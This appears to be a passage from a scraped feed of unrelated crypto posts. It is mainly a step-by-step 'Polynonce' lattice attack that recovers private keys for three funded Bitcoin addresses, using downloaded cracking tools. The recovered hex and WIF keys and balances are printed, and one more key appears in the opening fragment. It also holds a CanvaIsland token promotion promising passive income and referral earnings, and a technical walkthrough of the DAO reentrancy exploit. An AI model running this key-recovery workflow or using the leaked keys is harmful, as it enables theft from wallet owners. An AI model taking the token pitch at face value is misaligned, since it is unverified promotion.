Check the HEX of the private key: from bitcoin import * with open("PrivateKey.txt","r") as f: content = f.readlines() content = [x.strip() for x in content] f.close() outfile = open("PrivateKeyAddr.txt","w") for x in content: outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n") outfile.close() e2eadbde2e6a2adb6f81864cdf574dd44959717fe095486e2c0e55585594edf2:1L8v5aUZRzYbGKWcj9Yt6mGdd95Sy9bXjN Open bitaddress and check: ADDR: 1L8v5aUZRzYbGKWcj9Yt6mGdd95Sy9bXjN WIF: L4porgUmuBkMbATA6Pp7r8uqShFt2zTPNEfuPNYi1BCym4hhV8gs HEX: e2eadbde2e6a2adb6f81864cdf574dd44959717fe095486e2c0e55585594edf2 https://www.blockchain.com/en/explorer/addresses/btc/1L8v5aUZRzYbGKWcj9Yt6mGdd95Sy9bXjN BALANCE: $ 995.39 Literature: Lattice Attacks against Elliptic-Curve Signatures with Blinded Scalar Multiplication Dahmun Goudarzi, Matthieu Rivain, and Damien Vergnaud CryptoExperts, Paris, France Biased Nonce Sense: Lattice Attacks against Weak ECDSA Signatures in Cryptocurrencies Joachim Breitner and Nadia Heninger DFINITY Foundation, Zug University of California, San Diego Return of the Hidden Number Problem A Widespread and Novel Key Extraction Attack on ECDSA and DSA Keegan Ryan Minerva: The curse of ECDSA nonces Systematic analysis of lattice attacks on noisy leakage of bit-length of ECDSA nonces Ján Jančár, Vladimír Sedláček, Petr Švenda and Marek Sýs Masaryk University, Ca’ Foscari University of Venice Estimating the Effectiveness of Lattice Attacks Kotaro Abe and Makoto Ikeda School of Engineering, The University of Tokyo, Tokyo, Japan Source code ATTACKSAFE SOFTWARE Telegram: https://t.me/cryptodeeptech Video: https://youtu.be/CzaHitewN-4 Source: https://cryptodeep.ru/lattice-attack-249bits Cryptanalysis
  8. CRYPTO DEEP TECH In this article we will again touch on the topic of the “Critical vulnerability of Bitcoin” and in all three examples apply the completely new attack of 2023, the “POLYNONCE ATTACK”. The very first mentions of this attack are described in an article from “Kudelski Security”. https://research.kudelskisecurity.com/2023/03/06/polynonce-a-tale-of-a-novel-ecdsa-attack-and-bitcoin-tears/ As the practical basis we will take the materials from our earlier article “Speed up secp256k1 with endomorphism”, where the values on the secp256k1 curve from Hal Finney, LAMBDA and BETA, conceal the whole depth of the unknown in Bitcoin's elliptic curves. https://www.rapidtables.com/convert/number/hex-to-binary.html We also know very well the order of the secp256k1 curve, which consists of 128 bits Binary number (4 digits): “1111” // Hex number: “F” // n = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141 Speed up secp256k1 with endomorphism As the theoretical basis we will take the materials: “Polynonce Attack on Bitcoin” https://attacksafe.ru/polynonce-attack-on-bitcoin 1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB 929d565c386a279cf7a0382ba48cab1f72d62e7cfb3ab97b4f211d5673bc4441 RawTX 02000000019e3de154f8b473a796b9e39dd279dff1d907a4d27a1d8b23a055f97b08ad4c6e310000006b483045022100b29bdfc27ddf6bebd0e77c84b31dc1bc64b5b2276c8d4147421e96ef85467e8d02204ddd8ff0ffa19658e3b417be5f64d9c425a4d9fcd76238b8538c1d605b229baf0121027b06fe78e39ced37586c42c9ac38d7b2d88ccdd4cd1bb38816c0933f9b8db695ffffffff0169020000000000001600145fc8e854994406f93ea5c7f3abccc5d319ae2a3100000000 Load the HEX data with the echo utility and save it to the file RawTX.txt !echo '02000000019e3de154f8b473a796b9e39dd279dff1d907a4d27a1d8b23a055f97b08ad4c6e310000006b483045022100b29bdfc27ddf6bebd0e77c84b31dc1bc64b5b2276c8d4147421e96ef85467e8d02204ddd8ff0ffa19658e3b417be5f64d9c425a4d9fcd76238b8538c1d605b229baf0121027b06fe78e39ced37586c42c9ac38d7b2d88ccdd4cd1bb38816c0933f9b8db695ffffffff0169020000000000001600145fc8e854994406f93ea5c7f3abccc5d319ae2a3100000000' > RawTX.txt
To carry out the attack we will use the “ATTACKSAFE SOFTWARE” software www.attacksafe.ru/software Access permissions: !chmod +x attacksafe ls Usage: !./attacksafe -help -version: software version -list: list of bitcoin attacks -tool: indicate the attack -gpu: enable gpu -time: work timeout -server: server mode -port: server port -open: open file -save: save file -search: vulnerability search -stop: stop at mode -max: maximum quantity in mode -min: minimum quantity per mode -speed: boost speed for mode -range: specific range -crack: crack mode -field: starting field -point: starting point -inject: injection regimen -decode: decoding mode !./attacksafe -version Version 5.3.3. [ATTACKSAFE SOFTWARE, © 2023] List all attacks: !./attacksafe -list Select -tool: polynonce_attack 02000000019e3de154f8b473a796b9e39dd279dff1d907a4d27a1d8b23a055f97b08ad4c6e310000006b483045022100b29bdfc27ddf6bebd0e77c84b31dc1bc64b5b2276c8d4147421e96ef85467e8d02204ddd8ff0ffa19658e3b417be5f64d9c425a4d9fcd76238b8538c1d605b229baf0121027b06fe78e39ced37586c42c9ac38d7b2d88ccdd4cd1bb38816c0933f9b8db695ffffffff0169020000000000001600145fc8e854994406f93ea5c7f3abccc5d319ae2a3100000000 Run -tool polynonce_attack using the “ATTACKSAFE SOFTWARE” software !./attacksafe -tool polynonce_attack -open RawTX.txt -save SignatureRSZ.csv We ran this attack from -tool polynonce_attack and the result was saved to the file SignatureRSZ.csv Now, to see the successful result, open the file SignatureRSZ.csv To calculate the private key of the Bitcoin wallet from the file SignatureRSZ.csv we will install SageMath !wget https://cryptodeeptech.ru/sage-9.3-Ubuntu_20.04-x86_64.tar.bz2 !tar -xf sage-9.3-Ubuntu_20.04-x86_64.tar.bz2 cd SageMath/ ls !python3 relocate-once.py !mv '/content/attacksafe' '/content/SageMath/attacksafe' !mv '/content/SignatureRSZ.csv' '/content/SageMath/SignatureRSZ.csv' ls !wget 
https://raw.githubusercontent.com/demining/CryptoDeepTools/main/20PolynonceAttack/crack_weak_ECDSA_nonces_with_LLL.py !./sage -sh python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 128 4 > PrivateKey.txt cat PrivateKey.txt Мы получили приватный ключ к Биткоин Кошельку в HEX формате PrivKey = 0xf0a3e31646ce147bbd79bb6e45e6e9c8c4e51c535918c9b4cdca9528eb62172d Проверим POLYNONCE для каждой подписи ECDSA https://github.com/demining/CryptoDeepTools/blob/main/20PolynonceAttack/example1/POLYNONCE.py Результат: POLYNONCE >> 93e43392cb31d5d1f75175ee64ce16b7 efc86216627af576c29c9c52a0fd10fe POLYNONCE >> 93e43392cb31d5d1f75175ee64ce16b7 f88ff4c8a9ea4b61b1e087d0c0988826 POLYNONCE >> 93e43392cb31d5d1f75175ee64ce16b7 6849e83cd03d103bcc37aca8323c8d2f POLYNONCE >> 93e43392cb31d5d1f75175ee64ce16b7 efc86216627af576c29c9c52a0fd10fe Благодаря значение на кривой secp256k1 от Hal Finney LAMBDA и BETA раскрыл нам одинаковые первоначальные биты 128 bits так как первоначальные бит приватного ключа к Биткоин Кошельку начинается с Binary number (4 digits): "1111" // Hex number: "F" // Проверим HEX приватного ключа: !pip3 install bitcoin from bitcoin import * with open("PrivateKey.txt","r") as f: content = f.readlines() content = [x.strip() for x in content] f.close() outfile = open("PrivateKeyAddr.txt","w") for x in content: outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n") outfile.close() f0a3e31646ce147bbd79bb6e45e6e9c8c4e51c535918c9b4cdca9528eb62172d:1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB Откроем bitaddress и проверим: ADDR: 1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB WIF: L5HV2GiosXifcmijGCpFWdYiMRuXh4x4JVK29urGjfAWyasBYoDX HEX: f0a3e31646ce147bbd79bb6e45e6e9c8c4e51c535918c9b4cdca9528eb62172d https://www.blockchain.com/en/explorer/addresses/btc/1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB BALANCE: $ 3699.40 Рассмотрим остальные примеры: №2 137a6fqt13bhtAkGZWrgcGM98NLCotszR2 c1da9d117e15883ba41539f558ac870f53865ea00f68a8ff8bc7e8a9ee67099b RawTX 
010000000103ebc5c4b817124d45ad15e398ec32e9b9b7549c1fc10300ecbf36648c3cb5d42c0000006a47304402204e97dae0ab6e4eee9529f68687907c05db9037d9fbdba78dd01a3338a48d95b602207794cb7aa308243dfbdd5c20225777cd6e01bd7c4f76bf36948aa29290129c2b0121036360352efcff6a823eabb25578a29392eab4d302955fd54ece900578d2ab83b8ffffffff0162020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000 !rm RawTX.txt !rm NoncesHEX.txt !rm PrivateKey.txt !rm SignatureRSZ.csv !rm PrivateKeyAddr.txt !echo '010000000103ebc5c4b817124d45ad15e398ec32e9b9b7549c1fc10300ecbf36648c3cb5d42c0000006a47304402204e97dae0ab6e4eee9529f68687907c05db9037d9fbdba78dd01a3338a48d95b602207794cb7aa308243dfbdd5c20225777cd6e01bd7c4f76bf36948aa29290129c2b0121036360352efcff6a823eabb25578a29392eab4d302955fd54ece900578d2ab83b8ffffffff0162020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000' > RawTX.txt Запустим -tool polynonce_attack используя программное обеспечение “ATTACKSAFE SOFTWARE” !./attacksafe -tool polynonce_attack -open RawTX.txt -save SignatureRSZ.csv Мы запустили данную атаку из -tool polynonce_attack и результат сохранился в файл SignatureRSZ.csv Теперь чтобы посмотреть успешный результат откроем файл SignatureRSZ.csv !./sage -sh python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 128 4 > PrivateKey.txt cat PrivateKey.txt Мы получили приватный ключ к Биткоин Кошельку в HEX формате PrivKey = 0xff0178fa717374f7e74d43f00150748967ea04b64241ec10a10f62debb70868c Проверим POLYNONCE для каждой подписи ECDSA https://github.com/demining/CryptoDeepTools/blob/main/20PolynonceAttack/example2/POLYNONCE.py Результат: POLYNONCE >> 5220dae0c281e1115b4dd69ea3500f70 c5f6da6334586ed2bdc88a05f37bcf95 POLYNONCE >> 5220dae0c281e1115b4dd69ea3500f70 6f82fbd847c138ab48e778135e908149 POLYNONCE >> 5220dae0c281e1115b4dd69ea3500f70 5541022f8aeac81e5ce62e018d1cd722 POLYNONCE >> 5220dae0c281e1115b4dd69ea3500f70 80e88efaff419ecd84d7ded17dc548a7 Благодаря значение на кривой secp256k1 от Hal Finney LAMBDA и 
BETA раскрыл нам одинаковые первоначальные биты 128 bits так как первоначальные бит приватного ключа к Биткоин Кошельку начинается с Binary number (4 digits): "1111" // Hex number: "F" // Проверим HEX приватного ключа: from bitcoin import * with open("PrivateKey.txt","r") as f: content = f.readlines() content = [x.strip() for x in content] f.close() outfile = open("PrivateKeyAddr.txt","w") for x in content: outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n") outfile.close() Откроем bitaddress и проверим: ADDR: 137a6fqt13bhtAkGZWrgcGM98NLCotszR2 WIF: L5mQfFuzR3rzLtneJ7Tcv64JrHjCpK64UN4JRdGDxCUTbQ8NfHxo HEX: ff0178fa717374f7e74d43f00150748967ea04b64241ec10a10f62debb70868c https://www.blockchain.com/en/explorer/addresses/btc/137a6fqt13bhtAkGZWrgcGM98NLCotszR2 BALANCE: $ 1133.73 Рассмотрим остальные примеры: №3 1HxrEeC2X8UEcSvsemPJtTqrnbAetGWYUt fa80af660fc444d87853137506df02e5c75e8c2bf75dc44589b60356867a6d98 RawTX 01000000016eb80d35b08164302e49f88d8f86bf2827a91a5650149be38f4f73751ff41437060000006a473044022043d4c025a0f3be366a0d768c721b9b9191e0c3db6f2c6bfe34e8fb24af7f379102205a4fe2cc6944e00309c35619ff1242301b84d4728b863f97326f56dbd7a782220121027ccccf5f56ed78c2a761721ff3da0f76b792fbe4eae2ac73e7b4651bc3ef19cdffffffff01c057010000000000232103bec42e5d718b0e5b3853243c9bcf00dd671a335b0eb99fd8ca32f8d5784a9476ac00000000 !rm RawTX.txt !rm NoncesHEX.txt !rm PrivateKey.txt !rm SignatureRSZ.csv !rm PrivateKeyAddr.txt !echo '01000000016eb80d35b08164302e49f88d8f86bf2827a91a5650149be38f4f73751ff41437060000006a473044022043d4c025a0f3be366a0d768c721b9b9191e0c3db6f2c6bfe34e8fb24af7f379102205a4fe2cc6944e00309c35619ff1242301b84d4728b863f97326f56dbd7a782220121027ccccf5f56ed78c2a761721ff3da0f76b792fbe4eae2ac73e7b4651bc3ef19cdffffffff01c057010000000000232103bec42e5d718b0e5b3853243c9bcf00dd671a335b0eb99fd8ca32f8d5784a9476ac00000000' > RawTX.txt Запустим -tool polynonce_attack используя программное обеспечение “ATTACKSAFE SOFTWARE” !./attacksafe -tool 
polynonce_attack -open RawTX.txt -save SignatureRSZ.csv Мы запустили данную атаку из -tool polynonce_attack и результат сохранился в файл SignatureRSZ.csv Теперь чтобы посмотреть успешный результат откроем файл SignatureRSZ.csv !./sage -sh python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 128 4 > PrivateKey.txt cat PrivateKey.txt Мы получили приватный ключ к Биткоин Кошельку в HEX формате PrivKey = 0xfbc50a7158b3d9fd7fd58fe0874f20c10c650975dc118163debf442a44203fdf Проверим POLYNONCE для каждой подписи ECDSA https://github.com/demining/CryptoDeepTools/blob/main/20PolynonceAttack/example3/POLYNONCE.py Результат: POLYNONCE >> d7460c5b1a98f6d0443ae1cfe1f17814 fbc50a7158b3d9fd7fd58fe0874f20c1 POLYNONCE >> d7460c5b1a98f6d0443ae1cfe1f17814 d4de8d539655ecf0d50fd32187c3c467 POLYNONCE >> d7460c5b1a98f6d0443ae1cfe1f17814 6726aea1a6fd64d82dc657670352de72 POLYNONCE >> d7460c5b1a98f6d0443ae1cfe1f17814 89df16fd387156b39adca9a92464de18 Благодаря значение на кривой secp256k1 от Hal Finney LAMBDA и BETA раскрыл нам одинаковые первоначальные биты 128 bits так как первоначальные бит приватного ключа к Биткоин Кошельку начинается с Binary number (4 digits): "1111" // Hex number: "F" // Проверим HEX приватного ключа: from bitcoin import * with open("PrivateKey.txt","r") as f: content = f.readlines() content = [x.strip() for x in content] f.close() outfile = open("PrivateKeyAddr.txt","w") for x in content: outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n") outfile.close() Откроем bitaddress и проверим: ADDR: 1HxrEeC2X8UEcSvsemPJtTqrnbAetGWYUt WIF: L5f7p5bReuXLm3d7rFkpPyGQ1GNpiGuj8QuQ6rNCKXC9bs3J9GEY HEX: fbc50a7158b3d9fd7fd58fe0874f20c10c650975dc118163debf442a44203fdf https://www.blockchain.com/en/explorer/addresses/btc/1HxrEeC2X8UEcSvsemPJtTqrnbAetGWYUt BALANCE: $ 459.24 Literature: A Novel Related Nonce Attack for ECDSA, Marco Macchetti [Kudelski Security, Switzerland] (2023) Gallant, Robert P., Robert J. Lambert, and Scott A. Wanston. 
“Faster point multiplication on elliptic curves with efficient endomorphisms” . Annual International Conference on Cryptology, pp. 190–200. Springer, Berlin, Heidelberg, (2001) Hankerson, Darrell, Alfred J. Menezes, and Scott Wanston. “A Guide to Elliptic Curve Cryptography” . Computer Reviews 46, no. 1 (2005) Hal Finney. bitcointalk – “Acceleration of signature verification” . (2011) https://bitcointalk.org/index.php?topic=3238.0 Blahut, Richard E. “Cryptography and Secure Communication” . Cambridge University Press, (2014) Исходный код ATTACKSAFE SOFTWARE Telegram: https://t.me/cryptodeeptech Видеоматериал: https://youtu.be/7nKs_KHtyn4 Источник: https://cryptodeep.ru/polynonce-attack Криптоанализ
  9. CanvaIsland (CANVA) : GameFi ecosystem with Metaverse Built on Ethereum

CanvaIsland is a progressive decentralized ecosystem consisting of a Metaverse with an open world, a DeFi platform, a wallet and other products powered by the Ethereum blockchain. Within the Canva Island metaverse, users can create their own town, explore the world, monetize their content and earn tokens.

Just imagine an open world where you can identify yourself as anyone you want. You can spend time in the virtual world doing what you like and get tokens for it, appreciation from other users, and more, thanks to blockchain technology.

• Join huge communities by interest or to reach common goals in our metacommunity. Have fun at the different thematic events you couldn't attend before.
• Reach new heights in completely new professions.
• Create the craft that allows you to earn every second

CanvaIsland has been developing its ecosystem since 2021; currently it includes a Metaverse with NFT lands, Avatars, a DeFi platform and Canva Wallet, all built around the $CANVA token. Stake, make money in the metaverse, invite your friends, participate in special events and much, much more awaits you at Canva Island.

Join the Canvaisland AIRDROP

NFT Avatars

10,000 unique avatars from our team that will highlight you and give you many advantages. In addition, there will be integration of other PFP projects and directions into our CanvaIsland metaverse.

The possibility of earning with your avatars:

• Earning $CANVA tokens for NFT avatar holders
• Participation in unique quests for Avatar owners.
• Participation in special giveaways
• Participation in NFT staking and other pools.
• Separate chat for avatar owners
• Participation in early community exhibitions, which will result in cash grants and partnerships.
• Unique project avatars (limited)
• Ability to sell NFT avatars on our marketplace, Open Sea & others

CanvaIsland Islands and NFT-lands

Become the owner of a unique NFT-land in the CanvaIsland metaverse, build your city and monetize your content.
By purchasing plots on different islands, users will get access to the functionality of that island: building objects and the ability to sell their NFTs. Many ways to earn $CANVA tokens. Access to a closed community among land owners and much more! Our first island consists of 256 lands that have been successfully sold and are currently being traded on OpenSea. A new island with 1024 lands will be added soon.

Genesis Island (sold out, available on OpenSea)

The first island is 256 unique pieces of land in the form of NFTs on the Ethereum network, divided into 5 levels. This island makes investment sense for the establishment of the base and development of the project. After acquiring the land, the owners will gradually receive different benefits (PFP, tokens, NFT avatars of characters, access to a private chat to manage the development of the island and more).

Lake Island (soon)

This is the second island in the CanvaIsland Metaverse, with 1024 unique NFT-land sectors on the Ethereum network. These sectors make investment sense for creating a base and developing our metaverse. After the land acquisition, the owners will gradually receive various benefits. The function of minting land sectors and the launch of the island will be in the near future. Follow the announcements on our social networks.

Benefits for NFT-land owners:

• Possibility of construction of different buildings, objects
• Participation in unique quests for land owners
• Access to NFT staking and other pools (Soon)
• Passive income from land ownership (Soon)
• Creation and implementation of quests on their own territories
• Extraction of various resources (Soon)
• Access to land owners chat (Soon)
• Ability to sell NFT-land through our NFT marketplace, Open Sea or any other platforms
• Holding quests in their own territories
• Creating their own business by their own rules

Investment model for NFT land owners

We encourage users to grow the Canva Island metaverse, so all land owners can use NFT-staking to earn $CANVA tokens.
Land sectors are divided into levels and have different investment meanings.

About $CANVA token (Fair Launch soon)

$CANVA is an ERC-20 token built on the Ethereum blockchain. It is the main utility token in our progressive ecosystem. The $CANVA token is used in our metaverse and mobile wallet, as well as for buying NFTs, staking and more. $CANVA has a stable economic model and a deflationary mechanism. LP lock for 365 days. 900 million tokens minting by blocks. Canva is not traded yet. Fair Launch soon. Check Announcements in the official channel.

CANVA tokenomics

Burning mechanism:

• Initial NFT avatars sales: 50% of the funds from the initial sale of NFT Avatars will be used to buy back and burn
• Initial NFT lands sales: 50% of the funds from the initial sale of NFT Lands will be used to buy back and burn.
• Harvest fee: 50% of the harvest fee will be sent to the burn address
• Canva wallet fees: 100% of collected commissions from Canva Wallet will be sent to the burn address
• Early unstaking fee: 50% of the collected early-unstaking commissions will be sent to the burn address

CANVA Utility:

• CANVA token holders can generate passive income by staking their tokens in the staking pools and receive rewards in return - See Staking pools.
• CANVA token can be used in the Canva Island metaverse ecosystem
• CANVA token is used to buy game objects
• CANVA token can be used for NFT minting with discounts
• CANVA token holders can participate in the platform’s governance by proposing and voting for changes. (DAO)
• CANVA token allows you to save on Canva Wallet fees
• CANVA token allows you to participate in our Launchpad projects (soon)
• CANVA token is used to improve in-game items (soon)
• And much more to come

Canva staking pools

Canva Island Pools is a less resource-intensive alternative to mining. It lets you use your tokens to earn more tokens, for free and without limits. Simply put your cryptocurrency in a pool to receive rewards.
From the very beginning, a user could stake only $CANVA tokens in exchange for more $CANVA. Later, there are more opportunities: our users can stake other tokens in exchange for $CANVA.

Referral program

The Canva Island Referral Program allows you to invite friends and earn a 10% commission from their friends' earnings on Staking Pools.

Canva wallet

The Canva crypto-wallet is designed with the latest technology to ensure that your assets are secure and always accessible. Buy, sell, send, receive, and trade the most widely used ERC-20 tokens. Connect instantly to DApps. Earn interest, trade using decentralized exchanges, participate in NFT marketplaces and more.

Canvaisland Community: Telegram, Announcements Channel, Twitter, Discord
  10. CRYPTO DEEP TECH

In this article, we will look at a bug in the DAO code. The hacker exploited a bug in the code of the DAO and stole more or less $50 million worth of ether. I will focus here only on the main technical issue of the exploit: The fallback function. For a more detailed and advanced recount of the attack, the blog posts by Phil Daian and Peter Vessenes are highly recommended.

This post will be the first in what is potentially a series, deconstructing and explaining what went wrong at the technical level while providing a timeline tracing the actions of the attacker back through the blockchain. This first post will focus on how exactly the attacker stole all the money in the DAO.

A Multi-Stage Attack

This exploit in the DAO is clearly not trivial; the exact programming pattern that made the DAO vulnerable was not only known, but fixed by the DAO creators themselves in an earlier intended update to the framework’s code. Ironically, as they were writing their blog posts and claiming victory, the hacker was preparing and deploying an exploit that targeted the same function they had just fixed to drain the DAO of all its funds.

Let’s get into the overview of the attack. The attacker was analyzing DAO.sol, and noticed that the ‘splitDAO’ function was vulnerable to the recursive send pattern we’ve described above: this function updates user balances and totals at the end, so if we can get any of the function calls before this happens to call splitDAO again, we get the infinite recursion that can be used to move as many funds as we want (code comments are marked with XXXXX, you may have to scroll to see em):

    function splitDAO(
      uint _proposalID,
      address _newCurator
    ) noEther onlyTokenholders returns (bool _success) {

      ...
      // XXXXX Move ether and assign new Tokens.  Notice how this is done first!
      uint fundsToBeMoved =
          (balances[msg.sender] * p.splitData[0].splitBalance) /
          p.splitData[0].totalSupply;
      if (p.splitData[0].newDAO.createTokenProxy.value(fundsToBeMoved)(msg.sender) == false) // XXXXX This is the line the attacker wants to run more than once
          throw;

      ...
      // Burn DAO Tokens
      Transfer(msg.sender, 0, balances[msg.sender]);
      withdrawRewardFor(msg.sender); // be nice, and get his rewards
      // XXXXX Notice the preceding line is critically before the next few
      totalSupply -= balances[msg.sender]; // XXXXX AND THIS IS DONE LAST
      balances[msg.sender] = 0; // XXXXX AND THIS IS DONE LAST TOO
      paidOut[msg.sender] = 0;
      return true;
    }

The basic idea is this: propose a split. Execute the split. When the DAO goes to withdraw your reward, call the function to execute a split before that withdrawal finishes. The function will start running without updating your balance, and the line we marked above as “the attacker wants to run more than once” will run more than once. What does that do? Well, the source code is in TokenCreation.sol, and it transfers tokens from the parent DAO to the child DAO. Basically the attacker is using this to transfer more tokens than they should be able to into their child DAO.

How does the DAO decide how many tokens to move? Using the balances array of course:

    uint fundsToBeMoved = (balances[msg.sender] * p.splitData[0].splitBalance) / p.splitData[0].totalSupply;

Because p.splitData[0] is going to be the same every time the attacker calls this function (it’s a property of the proposal p, not the general state of the DAO), and because the attacker can call this function from withdrawRewardFor before the balances array is updated, the attacker can get this code to run arbitrarily many times using the described attack, with fundsToBeMoved coming out to the same value each time.
The first thing the attacker needed to do to pave the way for his successful exploit was to have the withdraw function for the DAO, which was vulnerable to the critical recursive send exploit, actually run.

Let’s look at what’s required to make that happen in code (from DAO.sol):

    function withdrawRewardFor(address _account) noEther internal returns (bool _success) {
      if ((balanceOf(_account) * rewardAccount.accumulatedInput()) / totalSupply < paidOut[_account])
        throw;

      uint reward =
        (balanceOf(_account) * rewardAccount.accumulatedInput()) / totalSupply - paidOut[_account];
      if (!rewardAccount.payOut(_account, reward)) // XXXXX vulnerable
        throw;
      paidOut[_account] += reward;
      return true;
    }

If the hacker could get the first if statement to evaluate to false, the statement marked vulnerable would run. When that statement runs, code that looks like this would be called:

    function payOut(address _recipient, uint _amount) returns (bool) {
      if (msg.sender != owner || msg.value > 0 || (payOwnerOnly && _recipient != owner))
        throw;
      if (_recipient.call.value(_amount)()) { // XXXXX vulnerable
        PayOut(_recipient, _amount);
        return true;
      } else {
        return false;
      }
    }

Notice how the marked line is exactly the vulnerable code mentioned in the description of the exploit we linked!

That line would then send a message from the DAO’s contract to “_recipient” (the attacker). “_recipient” would of course contain a default function, that would call splitDAO again with the same parameters as the initial call from the attacker. Remember that because this is all happening from inside withdrawFor from inside splitDAO, the code updating the balances in splitDAO hasn’t run. So the split will send more tokens to the child DAO, and then ask for the reward to be withdrawn again. Which will try to send tokens to “_recipient” again, which would again call splitDAO before updating the balances array.

And so it goes:

(1) Propose a split and wait until the voting period expires. (DAO.sol, createProposal)
(2) Execute the split. (DAO.sol, splitDAO)
(3) Let the DAO send your new DAO its share of tokens. (splitDAO -> TokenCreation.sol, createTokenProxy)
(4) Make sure the DAO tries to send you a reward before it updates your balance but after doing (3). (splitDAO -> withdrawRewardFor -> ManagedAccount.sol, payOut)
(5) While the DAO is doing (4), have it run splitDAO again with the same parameters as in (2) (payOut -> _recipient.call.value -> _recipient())
(6) The DAO will now send you more child tokens, and go to withdraw your reward before updating your balance. (DAO.sol, splitDAO)
(7) Back to (5)!
(8) Let the DAO update your balance. Because (7) goes back to (5), it never actually will :-).

(Side note: Ethereum’s gas mechanics don’t save us here. call.value passes on all the gas a transaction is working with by default, unlike the send function. So the code will run as long as the attacker will pay for it, which considering it’s a cheap exploit means indefinitely.)

Armed with this, we can provide a step by step re-trace of how The DAO got emptied out.

Step 1: Proposing the Split

The first step towards all of the above is to simply propose a regular split, as we’ve mentioned.

The attacker does this in the blockchain here in DAO Proposal #59, with the title “Lonely, so Lonely”.

Because of this line:

    // The minimum debate period that a split proposal can have
    uint constant minSplitDebatePeriod = 1 weeks;

he had to wait a week for the proposal to see approval. No matter, it’s just a split proposal like any other! Nobody will look too closely at it, right?

Step 2: Getting the Reward

As was neatly explained in one of slock.it’s previous posts on the matter, there are no rewards for the DAO to give out yet! (because no rewards were generated).
As we mentioned in the overview, the critical lines that need to run here are:

    function withdrawRewardFor(address _account) noEther internal returns (bool _success) {
      if ((balanceOf(_account) * rewardAccount.accumulatedInput()) / totalSupply < paidOut[_account]) // XXXXX
        throw;

      uint reward =
        (balanceOf(_account) * rewardAccount.accumulatedInput()) / totalSupply - paidOut[_account];
      if (!rewardAccount.payOut(_account, reward)) // XXXXX
        throw;
      paidOut[_account] += reward;
      return true;
    }

If the hacker could get the first marked line to run, the second marked line will run the default function of his choosing (that calls back to splitDAO as we described previously).

Let’s deconstruct the first if statement:

    if ((balanceOf(_account) * rewardAccount.accumulatedInput()) / totalSupply < paidOut[_account])

The balanceOf function is defined in Token.sol, and of course does exactly this:

    return balances[_owner];

The rewardAccount.accumulatedInput() line is evaluated from code in ManagedAccount.sol:

    // The sum of ether (in wei) which has been sent to this contract
    uint public accumulatedInput;

Luckily accumulatedInput is oh so simple to manipulate. Just use the default function of the reward account!

    function() {
      accumulatedInput += msg.value;
    }

Not only that, but because there is no logic to decrease accumulatedInput anywhere (it tracks the input the account has gotten from all the transactions ever), all the attacker needs to do is send a few Wei to the reward account and our original condition will not only evaluate to false, but its constituent values will evaluate to the same thing every time it’s called:

    if ((balanceOf(_account) * rewardAccount.accumulatedInput()) / totalSupply < paidOut[_account])

Remember that because balanceOf refers to balances, which never gets updated, and because paidOut and totalSupply also never get updated since that code in splitDAO never actually executes, the attacker gets to claim their tiny share of the reward with no problems.
And because they can claim their share of the reward, they can run their default function and reenter back to splitDAO. Whoopsie.

But do they actually need to include a reward? Let’s look at the line again:

    if ((balanceOf(_account) * rewardAccount.accumulatedInput()) / totalSupply < paidOut[_account])

What if the reward account balance is 0? Then we get

    if (0 < paidOut[_account])

If nothing has ever been paid out, this will always evaluate to false and never throw! Why? The original line is equivalent, after subtracting paidOut from both sides, to:

    if ((balanceOf(_account) * rewardAccount.accumulatedInput()) / totalSupply - paidOut[_account] < 0)

where that first part is actually how much is being paid out. So the check is actually:

    if (amountToBePaid < 0)

But if amountToBePaid is 0, the DAO pays you anyway. To me this doesn’t make much sense — why waste the gas in this manner? I think this is why many people assumed the attacker needed a balance in the reward account to proceed with the attack, something they in fact did not require. The attack works the same way with an empty reward account as with a full one!

Let’s take a look at the DAO’s reward address. The DAO accounting documentation from Slockit pegs this address as 0xd2e16a20dd7b1ae54fb0312209784478d069c7b0. Check that account’s transactions and you see a pattern: 200 pages of .00000002 ETH transactions to 0xf835a0247b0063c04ef22006ebe57c5f11977cc4 and 0xc0ee9db1a9e07ca63e4ff0d5fb6f86bf68d47b89, the attacker’s two malicious contracts (which we cover later). That’s one transaction for each recursive call of withdrawRewardFor, which we described above. So in this case there actually was a balance in the rewards account, and the attacker gets to collect some dust.

Step 3: The Big Short

A number of entirely unsubstantiated allegations on social media have pointed to a $3M Ethereum short that occurred on Bitfinex just moments before the attack, claiming this short closed with almost $1M USD of profit.
It’s obvious to anyone constructing or analyzing this attack that certain properties of the DAO (specifically that any split must be running the same code as the original DAO) require an attacker to wait through the creation period of their child DAO (27 days) before withdrawing any coins in a malicious split. This gives the community time to respond to a theft, through either a soft fork freezing attacker funds or a hard fork rolling back the compromise entirely.

Any financially motivated attacker who had attempted their exploit on the testnet would have an incentive to ensure profits regardless of a potential rollback or fork by shorting the underlying token. The staggering drop that resulted within minutes of the smart contract that triggered the malicious split provided an excellent profit opportunity, and while there is no proof the attacker took the profit opportunity, we can at least conclude that after all this effort they would have been stupid not to.

Step 3a: Preventing Exit (Resistance is Futile)

Another contingency that the attacker needed to think of is the case that a DAO split occurs before the attacker can finish emptying the DAO. In this case, with another user as sole curator, the attacker would have no access to DAO funds.

Unfortunately the attacker is a smart guy: there is evidence that the attacker has voted yes on all split proposals that come to term after his own, making sure that he would hold some tokens in the case of any DAO split. Because of a property of the DAO we’ll discuss later in the post, these split DAOs are vulnerable to the same emptying attack we’re describing here. All the attacker has to do is sit through the creation period, send some Ether to the reward account, and propose and execute a split by himself away from this new DAO. If he can execute before the curator of this new DAO updates the code to remove the vulnerability, he manages to squash all attempts to get Ether out of the DAO that aren’t his own.
